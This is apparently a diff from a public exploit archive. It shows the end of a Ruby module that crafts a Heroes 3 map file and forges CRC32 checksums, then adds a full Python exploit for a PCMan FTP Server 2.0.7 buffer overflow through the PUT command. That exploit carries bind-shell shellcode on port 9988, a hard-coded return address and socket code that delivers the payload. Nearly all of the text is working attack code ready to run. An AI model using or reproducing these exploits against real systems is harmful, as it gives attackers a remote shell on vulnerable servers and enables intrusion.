string.enum_for(:scan, substring).map { $~.offset(0)[0] }
end
#
# Loads a file
#
def read_file(fname)
buf = ''
::File.open(fname, 'rb') do |f|
buf << f.read
end
buf
end
#
# Returns data for a minimimum required S size h3m map containing 2 players
#
def make_default_h3m
buf = ''
# Set map specifications to 36x36 (0x24000000) map with 2 players, with
# default/no settings for name, description, victory condition etc
buf << "\x0e\x00\x00\x00\x01\x24\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buf << "\x00\x00\x01\x01\x01\x00\x01\x00\x00\x00\xff\x01\x01\x00\x01\x00"
buf << "\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x8c"
buf << "\x00\x00\xff\x00\x00\x00\x00\xb1\x00\x00\xff\x00\x00\x00\x00\x00"
buf << "\x00\x00\xff\x00\x00\x00\x00\x7f\x00\x00\xff\x00\x00\x00\x00\x48"
buf << "\x00\x00\xff\xff\xff\x00"
buf << "\xFF" * 16
buf << "\x00" * 35
# Each tile is 7 bytes, fill map with empty dirt tiles (0x00)
buf << "\x00" * (36 * 36 * 7)
# Set object attribute array count to 1
buf << "\x01\x00\x00\x00"
# Size of first sprite name, this will be overwritten
buf << "\x12\x34\x56\x78"
# Standard name for first object, which will be searched for
buf << 'AVWmrnd0.def'
buf
end
#
# Forge crc32 by adding 4 bytes at the end of data
# http://blog.stalkr.net/2011/03/crc-32-forging.html
#
def forge_crc32(data, wanted_crc)
crc32_reverse = [
0x00000000, 0xDB710641, 0x6D930AC3, 0xB6E20C82,
0xDB261586, 0x005713C7, 0xB6B51F45, 0x6DC41904,
0x6D3D2D4D, 0xB64C2B0C, 0x00AE278E, 0xDBDF21CF,
0xB61B38CB, 0x6D6A3E8A, 0xDB883208, 0x00F93449,
0xDA7A5A9A, 0x010B5CDB, 0xB7E95059, 0x6C985618,
0x015C4F1C, 0xDA2D495D, 0x6CCF45DF, 0xB7BE439E,
0xB74777D7, 0x6C367196, 0xDAD47D14, 0x01A57B55,
0x6C616251, 0xB7106410, 0x01F26892, 0xDA836ED3,
0x6F85B375, 0xB4F4B534, 0x0216B9B6, 0xD967BFF7,
0xB4A3A6F3, 0x6FD2A0B2, 0xD930AC30, 0x0241AA71,
0x02B89E38, 0xD9C99879, 0x6F2B94FB, 0xB45A92BA,
0xD99E8BBE, 0x02EF8DFF, 0xB40D817D, 0x6F7C873C,
0xB5FFE9EF, 0x6E8EEFAE, 0xD86CE32C, 0x031DE56D,
0x6ED9FC69, 0xB5A8FA28, 0x034AF6AA, 0xD83BF0EB,
0xD8C2C4A2, 0x03B3C2E3, 0xB551CE61, 0x6E20C820,
0x03E4D124, 0xD895D765, 0x6E77DBE7, 0xB506DDA6,
0xDF0B66EA, 0x047A60AB, 0xB2986C29, 0x69E96A68,
0x042D736C, 0xDF5C752D, 0x69BE79AF, 0xB2CF7FEE,
0xB2364BA7, 0x69474DE6, 0xDFA54164, 0x04D44725,
0x69105E21, 0xB2615860, 0x048354E2, 0xDFF252A3,
0x05713C70, 0xDE003A31, 0x68E236B3, 0xB39330F2,
0xDE5729F6, 0x05262FB7, 0xB3C42335, 0x68B52574,
0x684C113D, 0xB33D177C, 0x05DF1BFE, 0xDEAE1DBF,
0xB36A04BB, 0x681B02FA, 0xDEF90E78, 0x05880839,
0xB08ED59F, 0x6BFFD3DE, 0xDD1DDF5C, 0x066CD91D,
0x6BA8C019, 0xB0D9C658, 0x063BCADA, 0xDD4ACC9B,
0xDDB3F8D2, 0x06C2FE93, 0xB020F211, 0x6B51F450,
0x0695ED54, 0xDDE4EB15, 0x6B06E797, 0xB077E1D6,
0x6AF48F05, 0xB1858944, 0x076785C6, 0xDC168387,
0xB1D29A83, 0x6AA39CC2, 0xDC419040, 0x07309601,
0x07C9A248, 0xDCB8A409, 0x6A5AA88B, 0xB12BAECA,
0xDCEFB7CE, 0x079EB18F, 0xB17CBD0D, 0x6A0DBB4C,
0x6567CB95, 0xBE16CDD4, 0x08F4C156, 0xD385C717,
0xBE41DE13, 0x6530D852, 0xD3D2D4D0, 0x08A3D291,
0x085AE6D8, 0xD32BE099, 0x65C9EC1B, 0xBEB8EA5A,
0xD37CF35E, 0x080DF51F, 0xBEEFF99D, 0x659EFFDC,
0xBF1D910F, 0x646C974E, 0xD28E9BCC, 0x09FF9D8D,
0x643B8489, 0xBF4A82C8, 0x09A88E4A, 0xD2D9880B,
0xD220BC42, 0x0951BA03, 0xBFB3B681, 0x64C2B0C0,
0x0906A9C4, 0xD277AF85, 0x6495A307, 0xBFE4A546,
0x0AE278E0, 0xD1937EA1, 0x67717223, 0xBC007462,
0xD1C46D66, 0x0AB56B27, 0xBC5767A5, 0x672661E4,
0x67DF55AD, 0xBCAE53EC, 0x0A4C5F6E, 0xD13D592F,
0xBCF9402B, 0x6788466A, 0xD16A4AE8, 0x0A1B4CA9,
0xD098227A, 0x0BE9243B, 0xBD0B28B9, 0x667A2EF8,
0x0BBE37FC, 0xD0CF31BD, 0x662D3D3F, 0xBD5C3B7E,
0xBDA50F37, 0x66D40976, 0xD03605F4, 0x0B4703B5,
0x66831AB1, 0xBDF21CF0, 0x0B101072, 0xD0611633,
0xBA6CAD7F, 0x611DAB3E, 0xD7FFA7BC, 0x0C8EA1FD,
0x614AB8F9, 0xBA3BBEB8, 0x0CD9B23A, 0xD7A8B47B,
0xD7518032, 0x0C208673, 0xBAC28AF1, 0x61B38CB0,
0x0C7795B4, 0xD70693F5, 0x61E49F77, 0xBA959936,
0x6016F7E5, 0xBB67F1A4, 0x0D85FD26, 0xD6F4FB67,
0xBB30E263, 0x6041E422, 0xD6A3E8A0, 0x0DD2EEE1,
0x0D2BDAA8, 0xD65ADCE9, 0x60B8D06B, 0xBBC9D62A,
0xD60DCF2E, 0x0D7CC96F, 0xBB9EC5ED, 0x60EFC3AC,
0xD5E91E0A, 0x0E98184B, 0xB87A14C9, 0x630B1288,
0x0ECF0B8C, 0xD5BE0DCD, 0x635C014F, 0xB82D070E,
0xB8D43347, 0x63A53506, 0xD5473984, 0x0E363FC5,
0x63F226C1, 0xB8832080, 0x0E612C02, 0xD5102A43,
0x0F934490, 0xD4E242D1, 0x62004E53, 0xB9714812,
0xD4B55116, 0x0FC45757, 0xB9265BD5, 0x62575D94,
0x62AE69DD, 0xB9DF6F9C, 0x0F3D631E, 0xD44C655F,
0xB9887C5B, 0x62F97A1A, 0xD41B7698, 0x0F6A70D9
]
# forward calculation of CRC up to pos, sets current forward CRC state
fwd_crc = 0xffffffff
data.each_byte do |c|
fwd_crc = (fwd_crc >> 8) ^ Zlib.crc_table[(fwd_crc ^ c) & 0xff]
end
# backward calculation of CRC up to pos, sets wanted backward CRC state
bkd_crc = wanted_crc ^ 0xffffffff
# deduce the 4 bytes we need to insert
[fwd_crc].pack('<L').each_byte.reverse_each do |c|
bkd_crc = ((bkd_crc << 8) & 0xffffffff) ^ crc32_reverse[bkd_crc >> 24] ^ c
end
res = data + [bkd_crc].pack('<L')
res
end
end

55
platforms/windows/remote/37731.py Executable file
View file

@ -0,0 +1,55 @@
#!/usr/bin/python
# title: PCMan FTP Server v2.0.7 Buffer Overflow - PUT Command
# author: @shipcod3 (Jay Turla)
# nc <host> 9988
# Tested on Windows XP Service Pack 3 - English
# description: Buffer overflow is triggered upon sending long string using the command PUT to PCMAN FTP 2.07
import socket
import sys
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D' -t c
shellcode = (
"\xdb\xd0\xbb\x36\xcc\x70\x15\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x56\x83\xc2\x04\x31\x5a\x14\x03\x5a\x22\x2e\x85\xe9\xa2\x27"
"\x66\x12\x32\x58\xee\xf7\x03\x4a\x94\x7c\x31\x5a\xde\xd1\xb9"
"\x11\xb2\xc1\x4a\x57\x1b\xe5\xfb\xd2\x7d\xc8\xfc\xd2\x41\x86"
"\x3e\x74\x3e\xd5\x12\x56\x7f\x16\x67\x97\xb8\x4b\x87\xc5\x11"
"\x07\x35\xfa\x16\x55\x85\xfb\xf8\xd1\xb5\x83\x7d\x25\x41\x3e"
"\x7f\x76\xf9\x35\x37\x6e\x72\x11\xe8\x8f\x57\x41\xd4\xc6\xdc"
"\xb2\xae\xd8\x34\x8b\x4f\xeb\x78\x40\x6e\xc3\x75\x98\xb6\xe4"
"\x65\xef\xcc\x16\x18\xe8\x16\x64\xc6\x7d\x8b\xce\x8d\x26\x6f"
"\xee\x42\xb0\xe4\xfc\x2f\xb6\xa3\xe0\xae\x1b\xd8\x1d\x3b\x9a"
"\x0f\x94\x7f\xb9\x8b\xfc\x24\xa0\x8a\x58\x8b\xdd\xcd\x05\x74"
"\x78\x85\xa4\x61\xfa\xc4\xa0\x46\x31\xf7\x30\xc0\x42\x84\x02"
"\x4f\xf9\x02\x2f\x18\x27\xd4\x50\x33\x9f\x4a\xaf\xbb\xe0\x43"
"\x74\xef\xb0\xfb\x5d\x8f\x5a\xfc\x62\x5a\xcc\xac\xcc\x34\xad"
"\x1c\xad\xe4\x45\x77\x22\xdb\x76\x78\xe8\x6a\xb1\xb6\xc8\x3f"
"\x56\xbb\xee\x98\xa2\x32\x08\x8c\xba\x12\x82\x38\x79\x41\x1b"
"\xdf\x82\xa3\x37\x48\x15\xfb\x51\x4e\x1a\xfc\x77\xfd\xb7\x54"
"\x10\x75\xd4\x60\x01\x8a\xf1\xc0\x48\xb3\x92\x9b\x24\x76\x02"
"\x9b\x6c\xe0\xa7\x0e\xeb\xf0\xae\x32\xa4\xa7\xe7\x85\xbd\x2d"
"\x1a\xbf\x17\x53\xe7\x59\x5f\xd7\x3c\x9a\x5e\xd6\xb1\xa6\x44"
"\xc8\x0f\x26\xc1\xbc\xdf\x71\x9f\x6a\xa6\x2b\x51\xc4\x70\x87"
"\x3b\x80\x05\xeb\xfb\xd6\x09\x26\x8a\x36\xbb\x9f\xcb\x49\x74"
"\x48\xdc\x32\x68\xe8\x23\xe9\x28\x18\x6e\xb3\x19\xb1\x37\x26"
"\x18\xdc\xc7\x9d\x5f\xd9\x4b\x17\x20\x1e\x53\x52\x25\x5a\xd3"
"\x8f\x57\xf3\xb6\xaf\xc4\xf4\x92")
buffer = "\x90" * 30 + shellcode
#77c35459 : push esp # ret | {PAGE_EXECUTE_READ} [msvcrt.dll]
evil = "A"*2008 + "\x59\x54\xC3\x77" + buffer + "C"*(888-len(buffer))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((raw_input('Enter Host:'),21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('PUT ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close